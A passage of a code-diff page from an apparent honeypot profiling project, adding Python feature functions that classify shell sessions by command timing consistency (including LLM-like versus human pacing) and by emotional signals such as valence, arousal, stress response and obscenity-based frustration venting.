        signals.append(_clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV))

    load = sum(signals) / len(signals)
    if load < COGNITIVE_LOAD_LOW_MAX:
        value = "low"
    elif load < COGNITIVE_LOAD_MEDIUM_MAX:
        value = "medium"
    else:
        value = "high"

    # A composite of soft sub-signals: the full-confidence figure is kept
    # at 0.60, and short sessions fall back to 0.40.
    well_sampled = len(commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.cognitive_load",
        value=value,
        confidence=0.60 if well_sampled else 0.40,
    )
|
||||||
|
|
||||||
|
|
||||||
|
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_consistency``.

    The signal is the coefficient of variation (sample stdev divided by
    mean) of the gaps between consecutive commands:

    * ``metronomic`` — CV below ``PAUSE_CV_METRONOMIC_MAX`` (0.40).
      Reads as LLM-pure; the LLM-simulated session in this corpus sits
      at CV ≈ 0.24.
    * ``bimodal`` — CV at or above ``PAUSE_CV_BIMODAL_MIN`` (1.50).
      Heuristic stand-in for an LLM-assisted human. v0.1 looks at CV
      only; real bimodality detection (Hartigan dip / two-peak) is
      filed for v0.2 per the registry's ``notes:`` field.
    * ``variable`` — everything in between. Reads as human; the human
      session in this corpus sits at CV ≈ 0.94.

    Nothing is emitted when there are fewer than two gaps (stdev is
    undefined) or when the mean gap is not positive (the ratio would be
    meaningless). Confidence is 0.75, dropping to 0.40 for sessions
    shorter than ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
    """
    gaps = ctx.inter_cmd_iats
    if len(gaps) < 2:
        return

    avg_gap = statistics.fmean(gaps)
    if avg_gap <= 0.0:
        return

    dispersion = statistics.stdev(gaps) / avg_gap

    # The metronomic test is evaluated first, so it wins if the two
    # thresholds ever overlap.
    if dispersion < PAUSE_CV_METRONOMIC_MAX:
        label = "metronomic"
    else:
        label = "bimodal" if dispersion >= PAUSE_CV_BIMODAL_MIN else "variable"

    enough_commands = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_consistency",
        value=label,
        confidence=0.75 if enough_commands else 0.40,
    )
|
||||||
223
decnet/profiler/behave_shell/_features/emotional_valence.py
Normal file
223
decnet/profiler/behave_shell/_features/emotional_valence.py
Normal file
@@ -0,0 +1,223 @@
|
|||||||
|
"""``emotional_valence.*`` feature functions (Phase G, soft block).
|
||||||
|
|
||||||
|
All four primitives in this module ride a hard 0.5 confidence cap
|
||||||
|
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
|
||||||
|
the feature functions, *not* via :func:`make_observation` — sample-size
|
||||||
|
honesty may still pull confidence below 0.5.
|
||||||
|
|
||||||
|
Step G.5: ``emotional_valence.valence``.
|
||||||
|
Step G.6: ``emotional_valence.arousal``.
|
||||||
|
Step G.7: ``emotional_valence.stress_response``.
|
||||||
|
Step G.8: ``emotional_valence.frustration_venting``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import statistics
|
||||||
|
from typing import Iterator
|
||||||
|
|
||||||
|
from behave_core.spec.envelope import Observation
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||||
|
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||||
|
from decnet.profiler.behave_shell._thresholds import (
|
||||||
|
AROUSAL_BANG_RUN_MIN,
|
||||||
|
AROUSAL_CALM_IAT_S,
|
||||||
|
AROUSAL_CAPS_RUN_MIN,
|
||||||
|
AROUSAL_FAST_IAT_S,
|
||||||
|
AROUSAL_MIN_IATS,
|
||||||
|
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
|
||||||
|
FRUST_VENT_FULL_CONFIDENCE_MIN,
|
||||||
|
FRUST_VENT_MIN_TYPED_CHARS,
|
||||||
|
STRESS_DISTRESS_RATIO_MIN,
|
||||||
|
STRESS_EUSTRESS_RATIO_MIN,
|
||||||
|
STRESS_MIN_ERRORED_WITH_IATS,
|
||||||
|
VALENCE_FULL_CONFIDENCE_MIN,
|
||||||
|
VALENCE_MIN_HITS,
|
||||||
|
VALENCE_MIN_TYPED_CHARS,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _cap_soft(c: float) -> float:
    """Return *c* limited to ``EMOTIONAL_VALENCE_CONFIDENCE_CAP``.

    Values at or below the cap pass through unchanged; anything above
    is replaced by the cap itself.
    """
    ceiling = EMOTIONAL_VALENCE_CONFIDENCE_CAP
    return ceiling if ceiling < c else c
|
||||||
|
|
||||||
|
|
||||||
|
def valence(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.

    Compares the positive lexical hit count against the combined
    negative + obscenity hit count:

    * ``positive`` — positive hits strictly outnumber the negative side
      and reach ``VALENCE_MIN_HITS``.
    * ``negative`` — the negative side strictly outnumbers positive
      hits and reaches ``VALENCE_MIN_HITS``.
    * ``neutral`` — ties, and winners that fall short of the minimum.

    Nothing is emitted for sessions with fewer than
    ``VALENCE_MIN_TYPED_CHARS`` typed letters. Confidence is 0.50 once
    ``VALENCE_FULL_CONFIDENCE_MIN`` typed letters are available and
    0.30 otherwise, always passed through :func:`_cap_soft`.
    """
    typed = ctx.typed_letter_count
    if typed < VALENCE_MIN_TYPED_CHARS:
        return

    positive_hits = ctx.positive_lex_hits
    negative_hits = ctx.negative_lex_hits + ctx.obscenity_hits

    # Pick the side that is strictly ahead, then require it to clear
    # the minimum-hit floor before it is allowed to name the verdict.
    if positive_hits > negative_hits:
        label = "positive" if positive_hits >= VALENCE_MIN_HITS else "neutral"
    elif negative_hits > positive_hits:
        label = "negative" if negative_hits >= VALENCE_MIN_HITS else "neutral"
    else:
        label = "neutral"

    if typed >= VALENCE_FULL_CONFIDENCE_MIN:
        uncapped = 0.50
    else:
        uncapped = 0.30

    yield make_observation(
        ctx,
        primitive="emotional_valence.valence",
        value=label,
        confidence=_cap_soft(uncapped),
    )
|
||||||
|
|
||||||
|
|
||||||
|
def arousal(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
    high_agitated}.

    Only typing bursts holding at least three IATs are considered; if
    there are none, nothing is emitted. The median IAT of every such
    burst is taken, and the IAT total is summed across those bursts.

    ``high_agitated`` fires on any one of:

    * ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` — capslock rant.
    * ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` — repeated bangs.
    * the IAT total reaches ``AROUSAL_MIN_IATS`` and the fastest burst
      median is below ``AROUSAL_FAST_IAT_S``.

    ``low_calm`` — the IAT total reaches ``AROUSAL_MIN_IATS`` and the
    slowest burst median is above ``AROUSAL_CALM_IAT_S``.

    ``medium_engaged`` — everything else.

    Confidence is 0.50 when the IAT total reaches ``AROUSAL_MIN_IATS``
    and 0.30 otherwise, always passed through :func:`_cap_soft`.
    """
    bursts = [burst for burst in ctx.typing_bursts if len(burst) >= 3]
    if not bursts:
        return

    # One median per burst, reused for both the fastest and slowest pick.
    burst_medians = [statistics.median(burst) for burst in bursts]
    quickest = min(burst_medians)
    slowest = max(burst_medians)
    iat_total = sum(map(len, bursts))
    enough_iats = iat_total >= AROUSAL_MIN_IATS

    agitated = (
        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
        or (enough_iats and quickest < AROUSAL_FAST_IAT_S)
    )
    if agitated:
        label = "high_agitated"
    elif enough_iats and slowest > AROUSAL_CALM_IAT_S:
        label = "low_calm"
    else:
        label = "medium_engaged"

    uncapped = 0.50 if enough_iats else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.arousal",
        value=label,
        confidence=_cap_soft(uncapped),
    )
|
||||||
|
|
||||||
|
|
||||||
|
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.stress_response`` ∈ {none,
    eustress_positive, distress_negative}.

    Compares typing speed in the command typed right *after* an errored
    command against the rest of the session:

    * Post-error pool: intra-command IATs of every command whose
      predecessor errored.
    * Baseline pool: intra-command IATs of every other command
      (including the first command of the session).

    Verdict by ``median(post-error) / median(baseline)``:

    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` → ``eustress_positive``
      (slowed down — recovered, deliberate).
    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
      (sped up — anxious, mashing keys).
    * otherwise, or when either pool is empty, or when the baseline
      median is not positive → ``none``.

    Nothing is emitted for a session without commands. Confidence is
    0.50 when at least ``STRESS_MIN_ERRORED_WITH_IATS`` post-error
    commands carried IAT data and 0.30 otherwise, always passed through
    :func:`_cap_soft`.
    """
    commands = ctx.commands
    if not commands:
        return

    per_command_iats = ctx.intra_command_iats
    post_error_iats: list[float] = []
    baseline_iats: list[float] = []
    qualifying_errored = 0

    # Carry the previous command's error flag forward instead of
    # re-indexing ``commands[i - 1]``; the first command has no
    # predecessor and therefore always lands in the baseline pool.
    previous_errored = False
    for index, command in enumerate(commands):
        # Commands without a matching IAT entry contribute no samples.
        if index < len(per_command_iats):
            iats = list(per_command_iats[index])
        else:
            iats = []

        if previous_errored:
            if iats:
                qualifying_errored += 1
                post_error_iats.extend(iats)
        else:
            baseline_iats.extend(iats)
        previous_errored = command.errored

    value = "none"
    if post_error_iats and baseline_iats:
        med_base = statistics.median(baseline_iats)
        # A non-positive baseline makes the ratio meaningless.
        if med_base > 0.0:
            ratio = statistics.median(post_error_iats) / med_base
            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
                value = "eustress_positive"
            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
                value = "distress_negative"

    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.stress_response",
        value=value,
        confidence=_cap_soft(raw),
    )
|
||||||
|
|
||||||
|
|
||||||
|
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.

    Reads ``ctx.obscenity_hits`` directly:

    * ``detected`` — at least one obscenity hit; confidence 0.40.
    * ``none`` — zero hits; confidence 0.50 when the session has at
      least ``FRUST_VENT_FULL_CONFIDENCE_MIN`` typed letters, 0.30
      otherwise.

    Nothing is emitted below ``FRUST_VENT_MIN_TYPED_CHARS`` typed
    letters — too little text to call venting cleanly absent. The
    confidence is always passed through :func:`_cap_soft`.
    """
    typed = ctx.typed_letter_count
    if typed < FRUST_VENT_MIN_TYPED_CHARS:
        return

    if ctx.obscenity_hits >= 1:
        label, uncapped = "detected", 0.40
    elif typed >= FRUST_VENT_FULL_CONFIDENCE_MIN:
        label, uncapped = "none", 0.50
    else:
        label, uncapped = "none", 0.30

    yield make_observation(
        ctx,
        primitive="emotional_valence.frustration_venting",
        value=label,
        confidence=_cap_soft(uncapped),
    )
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user